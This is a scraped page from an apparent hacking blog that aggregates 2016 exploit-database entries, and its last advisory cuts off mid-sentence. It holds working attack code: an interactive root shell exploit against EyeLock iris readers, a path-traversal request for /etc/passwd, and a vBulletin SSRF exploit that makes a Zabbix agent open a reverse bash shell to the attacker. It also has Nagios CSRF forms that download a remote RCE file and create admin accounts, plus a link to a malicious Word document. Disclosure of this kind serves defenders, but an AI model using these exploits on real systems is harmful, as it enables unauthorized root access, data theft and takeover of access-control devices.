#!/usr/bin/env python
#
#
# EyeLock nano NXT 3.5 Remote Root Exploit
#
#
# Vendor: EyeLock, LLC
# Product web page: http://www.eyelock.com
# Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
# NXT Firmware: 3.04.1108 (ICM: 3.4.13)
# NXT Firmware: 3.03.944 (ICM: 3.3.2)
# NXT Firmware: 3.01.646 (ICM: 3.1.13)
#
# Platform: Hardware (Biometric Iris Reader (master))
#
# EyeLock is an advanced iris authentication and recognition solutions company
# focused on developing next-generation systems for global access control and identity
# management.
#
# Summary: nano NXT® - the next generation of EyeLock’s revolutionary access
# control solutions. nano NXT renders all other access control peripherals
# obsolete by revolutionizing how identities are protected, authenticated,
# and managed. With a sleek low profile and powerful capabilities, the nano
# NXT redefines the future of access control. An optional SDK is available
# to customers who want to customize their security solutions to integrate
# seamlessly with existing applications. The nano NXT authenticates up to 20
# people per minute, in-motion and at-a-distance with unparalleled accuracy.
# nano NXT can be used in a variety of environments including commercial/enterprise,
# corrections, data centers, education, financial services, government, healthcare
# facilities and hospitality.
#
# Nano NXT is the most advanced compact iris-based identity authentication device
# in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
# Nano NXT is a miniaturized iris-based recognition system capable of providing
# real-time identification, both in-motion and at a distance. The Nano NXT is an
# ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
# secured entrances, server rooms and any other physical space. Similarly the device
# is powerful and compact enough to secure high-value transactions, critical databases,
# network workstations or any other information system.
#
# Desc: EyeLock's nano NXT firmware latest version 3.5 (released 25.07.2016) suffers
# from multiple unauthenticated command injection vulnerabilities. The issue lies
# within the 'rpc.php' script located in the '/scripts' directory and can be triggered
# when user supplied input is not correctly sanitized while updating the local time for
# the device and/or get info from remote time server. The vulnerable script has two REQUEST
# parameters 'timeserver' and 'localtime' that are called within a shell_exec() function
# for setting the local time and the hardware clock of the device. An attacker can exploit
# these conditions gaining full system (root) access and execute OS commands on the affected
# device by injecting special characters to the affected parameters and further bypass
# the access control in place.
#
# Hint: Plenty other RCE bugs are present in the rpc.php and others (like: uploadCertificate.php,
# upgrade.php, WebConfig.php, firmwareupdate.php, interfaceeditor.php, etc.)
#
# =============================================================================
# /scripts/rpc.php:
# -----------------
# 9: if (isset($_REQUEST['action']))
# 10: {
# 11: switch($_REQUEST['action'])
# ...
# ...
# 181: case 'updatetime':
# 182: {
# 183: // do something, the put our response in the response field...
# 184: $strDate = shell_exec("rdate -s {$_REQUEST['timeserver']} 2>&1");
# 185:
# 186: // set the hardware clock.
# 187: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 188:
# 189: $strtheDate = shell_exec("date 2>&1");
# 190:
# 191: echo "updatetime|{$strDate}|{$strtheDate}";
# 192:
# 193: break;
# 194: }
# 195:
# 196: case 'updatelocaltime':
# 197: {
# 198: // do something, the put our response in the response field...
# 199: $strDate = shell_exec("date -s '{$_REQUEST['localtime']}' 2>&1");
# 200:
# 201: // set the hardware clock
# 202: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 203:
# 204: $strtheDate = shell_exec("date 2>&1");
# 205:
# 206: echo "updatelocaltime|{$strDate}|{$strtheDate}";
# 207:
# 208: break;
# 209: }
# =============================================================================
#
# -----------------------------------------------------------------------------
# Master: 192.168.40.1
# Slave: 192.168.40.2
#
# $ eyelock.py 192.168.40.1
#
# root@192.168.40.1:~# id
# uid=0(root) gid=0(root)
#
# root@192.168.40.1:~# cat /home/root/knockd.conf
# [options]
# logfile = /var/log/knockd.log
#
# [openSSH]
# sequence = 1973,1975,2013
# seq_timeout = 15
# command = /usr/sbin/iptables -D INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
# [closeSSH]
# sequence = 91,85,70
# seq_timeout = 5
# command = /usr/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
#
# root@192.168.40.1:~# exit
#
# $
# -----------------------------------------------------------------------------
#
#
# Tested on: GNU/Linux (armv7l)
# lighttpd/1.4.35
# SQLite/3.8.7.2
# PHP/5.6.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5357
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5357.php
#
#
# 10.06.2016
#
import re,sys,os
import requests
piton = os.path.basename(sys.argv[0])
print '''
---------------------------------------------------------
EyeLock nano NXT <=3.5 [Open Sesame] Remote Root Exploit
Zero Science Lab - http://zeroscience.mk
ZSL-2016-5357
---------------------------------------------------------
'''
if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ipaddress>\n'
sys.exit()
ipaddr = sys.argv[1]
print
while True:
try:
cmd = raw_input('root@'+ipaddr+':~# ')
# http://EyelockNxtMasterIP/scripts/rpc.php?action=updatelocaltime&localtime=%26whoami%26
execute = requests.get('http://'+ipaddr+'/scripts/rpc.php?action=updatetime×erver=||'+cmd)
pattern = re.compile(r'updatetime\|(.*?)\|',re.S|re.M)
cmdout = pattern.match(execute.text)
print cmdout.groups()[0].strip()
print
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591666
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
EyeLock nano NXT 3.5 Local File Disclosure Vulnerability
Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
NXT Firmware: 3.04.1108 (ICM: 3.4.13)
NXT Firmware: 3.03.944 (ICM: 3.3.2)
NXT Firmware: 3.01.646 (ICM: 3.1.13)
Platform: Hardware (Biometric Iris Reader (master))
Summary: Nano NXT is the most advanced compact iris-based identity authentication device
in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
Nano NXT is a miniaturized iris-based recognition system capable of providing
real-time identification, both in-motion and at a distance. The Nano NXT is an
ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
secured entrances, server rooms and any other physical space. Similarly the device
is powerful and compact enough to secure high-value transactions, critical databases,
network workstations or any other information system.
Desc: nano NXT suffers from a file disclosure vulnerability when input passed thru the
'path' parameter to 'logdownload.php' script is not properly verified before being used
to read files. This can be exploited to disclose contents of files from local resources.
==================================================================================
/scripts/logdownload.php:
-------------------------
1: <?php
2: header("Content-Type: application/octet-stream");
3: header("Content-Disposition: attachment; filename={$_GET['dlfilename']}");
4: readfile($_GET['path']);
5: ?>
==================================================================================
Tested on: GNU/Linux (armv7l)
lighttpd/1.4.35
SQLite/3.8.7.2
PHP/5.6.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5356
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5356.php
10.06.2016
--
http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
EyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation
Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: 3.3.21289.1311
Summary: myris® provides unparalleled security, is portable, lightweight
and is as easy as looking in a mirror. Use myris to quickly and easily
enroll users for EyeLock’s access control products or to grant users
access to corporate domain environments within seconds—users never have
to type their username and password again.
Desc: The application suffers from an unquoted search path issue impacting
the service 'MyrisService' for Windows deployed as part of Myris solution.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert their code in the
system root path undetected by the OS or other security applications where
it could potentially be executed during application startup or reboot. If
successful, the local user’s code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5355
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php
10.06.2016
--
C:\Users\joxy>sc qc MyrisService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MyrisService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Myris SDK Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
'''
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-6483
- Release date: 05.08.2016
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF)
vBulletin <= 4.2.3
vBulletin <= 3.8.9
II. BACKGROUND
-------------------------
vBulletin (vB) is a proprietary Internet forum software package developed by
vBulletin Solutions, Inc., a division of Internet Brands.
https://www.vbulletin.com/
https://en.wikipedia.org/wiki/VBulletin
A google search for "Powered by vBulletin" returns over 19 million sites
that are hosting a vBulletin forum:
https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22
III. INTRODUCTION
-------------------------
vBulletin forum software is affected by a SSRF vulnerability that allows
unauthenticated remote attackers to access internal services (such as mail
servers, memcached, couchDB, zabbix etc.) running on the server hosting
vBulletin as well as services on other servers on the local network that are
accessible from the target.
This advisory provides a PoC exploit that demonstrates how an unauthenticated
attacker could perform a port scan of the internal services as well as execute
arbitrary system commands on a target vBulletin host with a locally installed
Zabbix Agent monitoring service.
IV. DESCRIPTION
-------------------------
vBulletin allows forum users to share media fiels by uploading them to the
remote server. Some pages allow users to specify a URL to a media file
that a user wants to share which will then be retrieved by vBulletin.
The user-provided links are validated to make sure that users can only access
resources from HTTP/HTTPS protocols and that connections are not allowed in to
the localhost.
These restrictions can be found in core/vb/vurl/curl.php source file:
/**
* Determine if the url is safe to load
*
* @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host
* @return boolean
*/
private function validateUrl($urlinfo)
{
// VBV-11823, only allow http/https schemes
if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https')))
{
return false;
}
// VBV-11823, do not allow localhost and 127.0.0.0/8 range by default
if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host']))
{
return false;
}
if (empty($urlinfo['port']))
{
if ($urlinfo['scheme'] == 'https')
{
$urlinfo['port'] = 443;
}
else
{
$urlinfo['port'] = 80;
}
}
// VBV-11823, restrict detination ports to 80 and 443 by default
// allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to).
$config = vB::getConfig();
[...]
HTTP redirects are also prohibited however there is one place in the vBulletin
codebase that accepts redirects from the target server specified in a
user-provided link.
The code is used to upload media files within a logged-in user's profile and
can normally be accessed under a path similar to:
http://forum/vBulletin522/member/1-mike/media
By specifying a link to a malicious server that returns a 301 HTTP redirect to
the URL of http://localhost:3306 for example, an attacker could easily
bypass the restrictions presented above and make a connection to mysql/3306
service listening on the localhost.
This introduces a Server Side Request Forgery (SSRF) vulnerability.
As curl is used to fetch remote resources, in addition to HTTP, attackers could
specify a handful of other protocols to interact with local services.
For instance, by sending a redirect to gopher://localhost:11211/datahere
attackers could send arbitrary traffic to memcached service on 11211 port.
Additionally, depending on the temporary directory location configured within
the forum, attackers could potentially view the service responses as the
download function stores responses within temporary files which could be
viewed if the temporary directory is exposed on the web server.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
The exploit code below performs a port scan as well as demonstrates remote
command execution via a popular Zabbix Agent monitoring service which might be
listening on local port of 10050.
The exploit will execute a reverse bash shell on the target if it has the agent
installed and permits remote commands.
The exploit was verified on the following zabbix agent configuration
(/etc/zabbix/zabbix_agentd.conf):
Server=127.0.0.1,::1
EnableRemoteCommands=1
------------[ vBulletin_SSRF_exploit.py ]-----------
'''
#!/usr/bin/python
intro = """
vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE)
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default.
Coded by:
Dawid Golunski
http://legalhackers.com
"""
usage = """
Usage:
The exploit requires that you have an external IP and can start a listener on port 80/443
on the attacking machine.
./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port]
Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85
on the remote vBulletin target host:
./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85
Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g:
nc -vv -l -p 8080
Disclaimer:
For testing purposes only. Do no harm.
SSL/TLS support needs some tuning. For better results, provide HTTP URL to the vBulletin target.
"""
import web # http://webpy.org/installation
import threading
import time
import urllib
import urllib2
import socket
import ssl
import sys
# The listener that will send redirects to the targe
class RedirectServer(threading.Thread):
def run (self):
urls = ('/([0-9a-z_]+)', 'do_local_redir')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', our_port))
class do_local_redir:
def GET(self,whereto):
if whereto == "zabbixcmd_redir":
# code exec
# redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &') ; sleep 2s]
return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } )
else:
# internal port connection
return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} )
def shutdown(code):
print "\nJob done. Exiting"
if redirector_started == 1:
web.httpserver.server.interrupt = KeyboardInterrupt()
exit(code)
# [ Default settings ]
# reverse shell will connect back to port defined below
shell_port = 8080
# Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it)
our_port = 443
# How long to wait (seconds) before considering a port to be opened.
# Don't set it too high to avoid service timeout and an incorrect close state
connect_time = 2
# Default port scan range is limited to 20-90 to speed up things when testing,
# feel free to increase maxport to 65535 here or on the command line if you've
# got the time ;)
minport = 20
maxport = 90
# ignore invalid certs (enable if target forum is HTTPS)
#ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# [ Main Meat ]
print intro
redirector_started = 0
if len(sys.argv) < 3 :
print usage
sys.exit(2)
# Set our HTTP Listener/Redirector's external IP
our_ext_ip = sys.argv[1]
try:
socket.inet_aton(our_ext_ip)
except socket.error:
print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip
exit(2)
our_server = "http://%s:%s" % (our_ext_ip, our_port)
# Target forum base URL (e.g. http://vulnerable-vbulletin/forum)
targetforum = sys.argv[2]
# Append vulnerable media upload script path to the base URL
targeturl = targetforum.strip('/') + "/link/getlinkdata"
# Change port range (if provided)
if (len(sys.argv) == 5) :
minport = int(sys.argv[3])
# Finish scanning at maxport
maxport = int(sys.argv[4])
# Confirm data
print "\n* Confirm your settings\n"
print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport)
key = raw_input("Are these settings correct? Hit enter to start the port scan... ")
# Connection check
print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl
req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } )
try:
response = urllib2.urlopen(req, timeout=connect_time).read()
except urllib2.URLError as e:
print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason
shutdown(2)
# Server should return 'invalid_url' string if not url provided in POST
if "invalid_url" not in response:
print """Invalid target url (%s) or restricted access.\n
\nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl)
sys.exit(2)
else:
print "Got the right response from the URL. The target looks vulnerable!\n"
# [ Start the listener and perform a port scan ]
print "Let's begin!\n"
print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port)
RedirectServer().start()
redirector_started = 1
print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum)
start = time.time()
opened_ports = []
maxport+=1
for targetport in range(minport, maxport):
#print "\n\nScanning port %d\n" % (targetport)
fetchurl = '%s/%d' % (our_server, targetport)
data = urllib.urlencode({'url' : fetchurl})
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
try:
response = urllib2.urlopen(req, timeout=connect_time)
except urllib2.URLError, e:
print "Oops, url issue? 403 , 404 etc.\n"
except socket.timeout, ssl.SSLError:
print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport)
opened_ports.append(targetport)
elapsed = (time.time() - start)
print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum)
for listening in opened_ports:
print "Port %d : Opened\n" % listening
print "\nAnything juicy? :)\n"
if 10050 in opened_ports:
print "* Zabbix Agent was found on port 10050 !\n"
# [ Command execution via Zabbix Agent to gain a reverse shell ]
key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ")
if key != 'y' :
shutdown(0)
print "\n* Executing reverse shell via Zabbix Agent (10050)."
fetchurl = '%s/%s' % (our_server, 'zabbixcmd_redir')
data = urllib.urlencode({'url' : fetchurl})
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
payload_executed = 0
try:
response = urllib2.urlopen(req, timeout=connect_time)
except urllib2.URLError, e:
print "Oops, url issue? 403 , 404 etc.\n"
except socket.timeout, ssl.SSLError:
# Agent connection remained opened for 2 seconds after the bash payload was sent,
# it looks like the sleep 2s shell command must have got executed sucessfuly
payload_executed = 1
if (payload_executed == 1) :
print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port
else:
print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n"
shutdown(0)
'''
----------------------[ eof ]------------------------
Example run:
root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85
vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE)
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default.
Coded by:
Dawid Golunski
http://legalhackers.com
* Confirm your settings
Redirect server to listen on: 192.168.57.10:443
Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata
Scan ports between: 20 - 85
Are these settings correct? Hit enter to start the port scan...
* Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata]
Got the right response from the URL. The target looks vulnerable!
Let's begin!
* Starting our redirect base server on 192.168.57.10:443
* Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target
http://0.0.0.0:443/
192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301
192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301
192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301
Conection opened for 2 seconds. Port 22 is opened!
192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301
192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301
192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301
Conection opened for 2 seconds. Port 25 is opened!
192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301
[...]
192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301
192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301
Conection opened for 2 seconds. Port 80 is opened!
192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301
192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301
192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301
192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301
192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301
Scanning done in 14 seconds.
* Opened ports on the target [http://192.168.57.10/vBulletin522new/]:
Port 22 : Opened
Port 25 : Opened
Port 80 : Opened
Anything juicy? :)
Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y
* Executing reverse shell via Zabbix Agent (10050).
192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301
Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :)
Job done. Exiting
Here is how the netcat session looks like after a sucessful exploitation:
$ nc -vvv -l -p 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259)
zabbix@trusty:/$ id
id
uid=122(zabbix) gid=129(zabbix) groups=129(zabbix)
zabbix@trusty:/$
As we can see reverse shell was executed on the target which sucessfully
connected back to the attacker's netcat listener.
VI. BUSINESS IMPACT
-------------------------
The vulnerability can expose internal services running on the server/within
the local network.
If not patched, unauthenticated attackers or automated scanners searching for
vulnerable servers could send malicious data to internal services.
Depending on services in use, the impact could range from sensitive information
disclosure, sending spam, DoS/data loss to code execution as demonstrated by
the PoC exploit in this advisory.
VII. SYSTEMS AFFECTED
-------------------------
All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches
named in the next section are affected by this vulnerability.
VIII. SOLUTION
-------------------------
Upon this advisory, vendor has published the following security releases of
vBulletin for each of the affected branches:
vBulletin 5.2.3
vBulletin 4.2.4 Beta
vBulletin 3.8.10 Beta
Separate patches have also been released (see references below).
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483
vBulletin patches:
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
05.08.2016 - final advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
===================
1) Introduction
===================
Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983[3] under the name Multi-Tool Word for Xenix systems.[4][5][6] Subsequent versions were later written for several other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985), Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite. Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.
(https://en.wikipedia.org/wiki/Microsoft_Word)
#######################################################################################
===================
2) Report Timeline
===================
2016-05-15: Sébastien Morin of COSIG report the vulnerability to MSRC.
2016-06-07: MSRC confirm the vulnerability
2016-08-09: Microsoft fixed the issue (MS16-099).
2016-08-09: Advisory released.
#######################################################################################
===================
3) Technical details
===================
This vulnerability allow remote code execution if a user opens a specially crafted Microsoft Office Word (.doc) with an invalid WordDocumentStream.
An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.
#######################################################################################
==========
4) POC
==========
https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40224.zip
#######################################################################################
[+] Credits: John Page ( hyp3rlinx )
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.nagios.com
Product:
==============================
Nagios Network Analyzer v2.2.1
Netflow Analysis, Monitoring, and Bandwidth Utilization Software
Network Analyzer provides an in-depth look at all network traffic sources
and potential security threats allowing system
admins to quickly gather high-level information regarding the health of the
network as well as highly granular data for
complete and thorough network analysis.
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be
transmitted from a user that the website trusts if that user is
authenticated and visits a malicious webpage or clicks a attacker supplied
link. The Nagios system can be compromised as remote attackers
can create arbitrary commands e.g. using "wget" to download RCE files onto
the system, create arbitrary Admins, delete users, and conduct
DOS attacks.
Exploit code(s):
================
1) Create arbitrary commands
<form action="
http://victim-server/nagiosna/index.php/api/system/create_command"
method="post">
<input type="hidden" name="name" value="pwn">
<input type="hidden" name="location" value="%2Fusr%2Fbin%2Fwget">
<input type="hidden" name="script" value="wget">
<input type="hidden" name="args"
value="http%3A%2F%2Fattacker-server%2FRCE.php">
<script>document.forms[0].submit()</script>
</form>
2) Add Admin
<form action="http://victim-server/nagiosna/index.php/admin/users/create"
method="post" accept-charset="utf-8">
<input type="text" name="first_name" value="CSRF">
<input type="text" name="last_name" value="ME">
<input type="text" name="company" value="PWN">
<input type="text" name="email" value="evil@abyss.com">
<input type="text" name="phone" value="">
<input type="text" name="username" value="HYP3RLINX">
<input type="password" name="password" value="abc123">
<input type="password" name="password2" value="abc123">
<input type="hidden" name="language" value="default" >
<input type="hidden" name="account_type" id="account_type" value="local">
<input type="hidden" name="ldap_server" id="ldap_server">
<input type="hidden" name="ad_server" id="ad_server" value="1">
<input type="text" name="ad_username" id="ad_username">
<input type="text" name="dn" placeholder="cn=John Smith,dn=nagios,dc=com">
<input type="radio" name="group" value="1" checked="true" >
<input type="radio" name="apiaccess" value="1" >
<input type="radio" name="apiaccess" value="0" checked>
<script>document.forms[0].submit()</script>
</form>
3) Delete reports (report ID must be known or guessed)
<form action="http://victim-server/nagiosna/index.php/api/reports/delete"
method="post">
<input type="hidden" name="q[rid]" value="9">
<script>document.forms[0].submit()</script>
</form>
4) DOS
<form action="http://victim-server/nagiosna/index.php/api/system/stop"
method="post">
<input type="hidden" name="sid" value="1">
<script>//document.forms[0].submit()</script>
</form>
5) Delete users (user ID must be known or guessed)
<form action="http://victim-server/nagiosna/index.php/admin/users/delete"
method="post">
<input type="hidden" name="id" value="10">
<script>document.forms[0].submit()</script>
</form>
Disclosure Timeline:
======================================
Vendor Notification: July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
Cross-Site Request Forgery vulnerability in Add From Server WordPress Plugin
Abstract
It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). An attacker can use this issue to add illegal content to the victims server, or add very large files to the victim's server to exaust the amount of avalible disk space.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160718-0004
Tested versions
These issues were successfully tested on Add From Server WordPress Plugin version 6.2.
Fix
This issue is resolved in Add From Server version 3.3.2.
Introduction
The Add From Server WordPress Plugin is a quick plugin, which allows you to import media & files into the WordPress uploads manager from (remote) webservers. It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). Because of this,
the following attack scenario's could be possible:
